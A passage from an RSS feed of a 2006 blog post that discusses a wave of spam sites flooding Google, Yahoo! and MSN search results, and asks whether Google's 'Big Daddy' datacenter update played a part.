One also has to wonder how many of these problems may have come as a result of the upgrade Google did to its datacenters, <a href="http://en.wikipedia.org/wiki/Big_Daddy_Google">dubbed &#8220;Big Daddy&#8221;</a>.  Google did not seem to have these sorts of problems before this, so perhaps there is a correlation, though not necessarily a cause.  It&#8217;s interesting to note, however, that the aim of the &#8220;Big Daddy&#8221; updates was to <em>prevent</em> this sort of thing &#8211; and to keep meaningful sites in the index, which is exactly the opposite of what happened, since the spamming from these sites evidently bumped important sites out of the indexes.
</p>
<p>
This recent round of spamming was not unique to Google; it affected the Yahoo! and MSN search results as well, though not to the extent that it affected Google&#8217;s.  It was probably not the intention of the spammer to get so many pages indexed on Google, and things probably got &#8220;out of hand&#8221; quickly.  Still, one has to wonder whether this spam site directly targeted Google in its quest for search engine manipulation, or whether this was just a coincidence.  Either way, the problem for search engines remains: how to effectively discriminate between meaningful and useless information without making too many mistakes, one way or the other.
</p>
<p>
Thankfully, it appears that Google is working on fixing this problem, and not just by removing the most recent spam.  It will take some work, and I think they will eventually arrive at a solution, but as always, spammers will be working to gain the upper hand as well.  Let&#8217;s hope that the combined effort of companies like Google, Yahoo! and Microsoft can thwart them, or else the Internet may become awash in the useless garbage of spam.</p>
]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2006/06/19/search-engine-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

